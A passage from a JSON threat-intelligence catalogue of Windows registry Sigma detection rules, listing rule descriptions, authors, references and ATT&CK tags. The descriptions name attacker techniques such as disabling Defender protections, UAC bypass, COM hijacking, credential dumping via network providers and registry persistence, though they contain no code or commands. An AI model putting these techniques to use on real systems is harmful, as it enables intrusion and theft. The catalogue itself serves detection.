], "filename": "registry_set_new_application_appcompat.yml", "level": "informational", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.md", "https://github.com/OTRF/detection-hackathon-apt29/issues/1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_application_appcompat.yml" ], "tags": [ "attack.execution", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "60936b49-fca0-4f32-993d-7415edcf9a5d", "value": "New Application in AppCompat" }, { "description": "Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-16", "falsepositive": [ "Legitimate use of external DB to save the results" ], "filename": "registry_set_bginfo_custom_db.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bginfo_custom_db.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "53330955-dc52-487f-a3a2-da24dcff99b5", "value": "New BgInfo.EXE Custom DB Path Registry Configuration" }, { "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", 
"meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-07-04", "falsepositive": [ "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" ], "filename": "registry_set_disabled_microsoft_defender_eventlog.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", "value": "Disabled Windows Defender Eventlog" }, { "description": "Detects disabling Windows Defender Tamper Protection", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-04", "falsepositive": [ "Unknown" ], "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "93d298a1-d28f-47f1-a468-d971e7796679", "value": "Disable Tamper Protection on Windows Defender" }, { "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, 
similar to how the NPPSpy tool does it", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-23", "falsepositive": [ "Other legitimate network providers used and not filtred in this rule" ], "filename": "registry_set_new_network_provider.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/troubleshoot/windows-client/setup-upgrade-and-drivers/network-provider-settings-removed-in-place-upgrade", "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_network_provider.yml" ], "tags": [ "attack.credential-access", "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", "value": "Potential Credential Dumping Attempt Using New NetworkProvider - REG" }, { "description": "Detects the setting of the REGISTERAPPRESTART compatibility layer on an application.\nThis compatibility layer allows an application to register for restart using the \"RegisterApplicationRestart\" API.\nThis can be potentially abused as a persistence mechanism.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-01-01", "falsepositive": [ "Legitimate applications making use of this feature for compatibility reasons" ], "filename": "registry_set_persistence_app_cpmpat_layer_registerapprestart.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/Misc-Research/blob/d114d6a5e0a437d3818e492ef9864367152543e7/Other/Persistence-Via-RegisterAppRestart-Shim.md", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml" ], "tags": [ "attack.persistence", "attack.t1546.011" ] }, "related": [ { "dest-uuid": "42fe883a-21ea-4cfb-b94a-78b6476dcc83", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b86852fb-4c77-48f9-8519-eb1b2c308b59", "value": "Potential Persistence Via AppCompat RegisterAppRestart Layer" }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a80f662f-022f-4429-9b8c-b1a41aaa6688", "value": "Internet Explorer Autorun Keys Modification" }, { "description": "Detect change of the user account associated with the FAX service to avoid the 
escalation problem.", "meta": { "author": "frack113", "creation_date": "2022-07-17", "falsepositive": [ "Unknown" ], "filename": "registry_set_fax_change_service_user.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://twitter.com/dottor_morte/status/1544652325570191361", "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e3fdf743-f05b-4051-990a-b66919be1743", "value": "Change User Account Associated with the FAX Service" }, { "description": "Detects disabling Windows Defender PUA protection", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-04", "falsepositive": [ "Unknown" ], "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_pua_protection_on_microsoft_defender.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8ffc5407-52e3-478f-9596-0a7371eafe13", "value": "Disable PUA Protection on Windows Defender" }, { "description": "Detects changes to the PSFactory COM InProcServer32 registry. 
This technique was used by RomCom to create persistence storing a malicious DLL.", "meta": { "author": "BlackBerry Threat Research and Intelligence Team - @Joseliyo_Jstnk", "creation_date": "2023-06-07", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_comhijack_psfactorybuffer.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine", "https://strontic.github.io/xcyclopedia/library/clsid_C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6.html", "https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html", "https://www.virustotal.com/gui/file/6d3ab9e729bb03ae8ae3fcd824474c5052a165de6cb4c27334969a542c7b261d/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml" ], "tags": [ "attack.persistence", "attack.t1546.015" ] }, "related": [ { "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "243380fa-11eb-4141-af92-e14925e77c1b", "value": "Potential PSFactoryBuffer COM Hijacking" }, { "description": "Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.\nBefore doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. 
This registry key should store a value named \"Ime File\" with a DLL path.\nIMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.\n", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-11-21", "falsepositive": [ "Unknown" ], "filename": "registry_set_ime_suspicious_paths.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ime_suspicious_paths.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9d8f9bb8-01af-4e15-a3a2-349071530530", "value": "Suspicious Path In Keyboard Layout IME File Registry Value" }, { "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", "meta": { "author": "frack113", "creation_date": "2022-01-24", "falsepositive": [ "Unknown" ], "filename": "registry_set_blackbyte_ransomware.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
"type": "related-to" } ], "uuid": "83314318-052a-4c90-a1ad-660ece38d276", "value": "Blackbyte Ransomware Registry" }, { "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_natural_language.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/", "https://persistence-info.github.io/Data/naturallanguage6.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_natural_language.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", "value": "Potential Persistence Via DLLPathOverride" }, { "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", "meta": { "author": "Syed Hasan (@syedhasan009)", "creation_date": "2021-06-18", "falsepositive": [ "Unknown" ], "filename": "registry_set_taskcache_entry.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://labs.f-secure.com/blog/scheduled-task-tampering/", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml" ], "tags": [ "attack.persistence", "attack.t1053", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", 
"tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", "value": "Scheduled TaskCache Change by Uncommon Program" }, { "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", "meta": { "author": "frack113", "creation_date": "2021-12-30", "falsepositive": [ "Legitimate custom SHIM installations will also trigger this rule" ], "filename": "registry_set_persistence_shim_database.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb", "https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/", "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_database.yml" ], "tags": [ "attack.persistence", "attack.t1546.011" ] }, "related": [ { "dest-uuid": "42fe883a-21ea-4cfb-b94a-78b6476dcc83", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", "value": "Potential Persistence Via Shim Database Modification" }, { "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", "meta": { "author": "frack113", "creation_date": "2022-12-11", 
"falsepositive": [ "Unknown" ], "filename": "registry_set_legalnotice_susp_message.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1491.001/T1491.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_legalnotice_susp_message.yml" ], "tags": [ "attack.impact", "attack.t1491.001" ] }, "related": [ { "dest-uuid": "8c41090b-aa47-4331-986b-8c9a51a91103", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8b9606c9-28be-4a38-b146-0e313cc232c1", "value": "Potential Ransomware Activity Using LegalNotice Message" }, { "description": "Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper\n", "meta": { "author": "Anish Bogati", "creation_date": "2023-11-28", "falsepositive": [ "Legitimate helper added by different programs and the OS" ], "filename": "registry_set_netsh_helper_dll_potential_persistence.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll", "https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml" ], "tags": [ "attack.persistence", "attack.t1546.007" ] }, "related": [ { "dest-uuid": "f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c90362e0-2df3-4e61-94fe-b37615814cb1", "value": "Potential Persistence Via Netsh Helper DLL - Registry" }, { "description": "Detects potential PowerShell commands or code within 
registry run keys", "meta": { "author": "frack113, Florian Roth (Nextron Systems)", "creation_date": "2022-03-17", "falsepositive": [ "Legitimate admin or third party scripts. Baseline according to your environment" ], "filename": "registry_set_powershell_in_run_keys.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry", "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8d85cf08-bf97-4260-ba49-986a2a65129c", "value": "Suspicious Powershell In Registry Run Keys" }, { "description": "Detects potential COM object hijacking via modification of default system CLSID.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-07-16", "falsepositive": [ "Unlikely" ], "filename": "registry_set_persistence_com_hijacking_builtin.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)", "https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/", "https://blog.talosintelligence.com/uat-5647-romcom/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_builtin.yml" ], "tags": [ "attack.persistence", "attack.t1546.015" ] }, "related": [ { "dest-uuid": 
"bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "790317c0-0a36-4a6a-a105-6e576bf99a14", "value": "COM Object Hijacking Via Modification Of Default System CLSID Default Value" }, { "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to Windows event channel.", "meta": { "author": "frack113", "creation_date": "2022-09-17", "falsepositive": [ "Unknown" ], "filename": "registry_set_change_winevt_channelaccess.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/api/winevt/", "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7d9263bd-dc47-4a58-bc92-5474abab390c", "value": "Change Winevt Channel Access Permission Via Registry" }, { "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", "meta": { "author": "@ScoubiMtl", "creation_date": "2021-04-05", "falsepositive": [ "Unlikely" ], "filename": "registry_set_office_outlook_enable_macro_execution.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml" ], "tags": [ "attack.persistence", "attack.command-and-control", "attack.t1137", "attack.t1008", "attack.t1546" ] }, "related": [ { "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", "value": "Outlook Macro Execution Without Warning Setting Enabled" }, { "description": "Detects changes to the \"NoLMHash\" registry value in order to allow Windows to store LM Hashes.\nBy setting this registry value to \"0\" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-12-15", "falsepositive": [ "Unknown" ], "filename": "registry_set_system_lsa_nolmhash.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a", "https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password", "https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_system_lsa_nolmhash.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c420410f-c2d8-4010-856b-dffe21866437", "value": "Enable LM Hash Storage" }, { "description": "Detects registry changes to Microsoft Office \"VBAWarning\" to a value of \"1\" which enables the execution of all macros, whether signed or unsigned.", "meta": { "author": "Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-05-22", "falsepositive": [ "Unlikely" ], "filename": "registry_set_office_vba_warnings_tamper.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/", "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", "https://twitter.com/inversecos/status/1494174785621819397", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_vba_warnings_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "91239011-fe3c-4b54-9f24-15c86bb65913", "value": "Office Macros Warning Disabled" }, { "description": "Attempts to detect system changes made by Blue Mockingbird", "meta": { "author": "Trent Liffick (@tliffick)", "creation_date": "2020-05-14", "falsepositive": [ "Unknown" ], "filename": "registry_set_mal_blue_mockingbird.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/blue-mockingbird-cryptominer/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_blue_mockingbird.yml" ], "tags": [ "attack.execution", "attack.t1112", "attack.t1047" ] }, "related": [ { "dest-uuid": 
"57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "92b0b372-a939-44ed-a11b-5136cf680e27", "value": "Blue Mockingbird - Registry" }, { "description": "Bypasses User Account Control using a fileless method", "meta": { "author": "frack113", "creation_date": "2022-01-05", "falsepositive": [ "Unknown" ], "filename": "registry_set_bypass_uac_using_delegateexecute.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute", "https://learn.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "46dd5308-4572-4d12-aa43-8938f0184d4f", "value": "Bypass UAC Using DelegateExecute" }, { "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-04-05", "falsepositive": [ "Unknown" ], "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml", "level": "high", "logsource.category": 
"registry_set", "logsource.product": "windows", "refs": [ "https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" ], "tags": [ "attack.persistence", "attack.command-and-control", "attack.t1137", "attack.t1008", "attack.t1546" ] }, "related": [ { "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "396ae3eb-4174-4b9b-880e-dc0364d78a19", "value": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting" }, { "description": "Detects disabling Windows Defender Exploit Guard Network Protection", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-04", "falsepositive": [ "Unknown" ], "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" 
} ], "uuid": "bf9e1387-b040-4393-9851-1598f8ecfae9", "value": "Disable Exploit Guard Network Protection on Windows Defender" }, { "description": "Detect possible persistence using Fax DLL load when service restart", "meta": { "author": "frack113", "creation_date": "2022-07-17", "falsepositive": [ "Unknown" ], "filename": "registry_set_fax_dll_persistance.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://twitter.com/dottor_morte/status/1544652325570191361", "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", "value": "Change the Fax Dll" }, { "description": "Detects changes to the Internet Explorer \"DisableFirstRunCustomize\" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-16", "falsepositive": [ "As this is controlled by group policy as well as user settings. Some false positives may occur." 
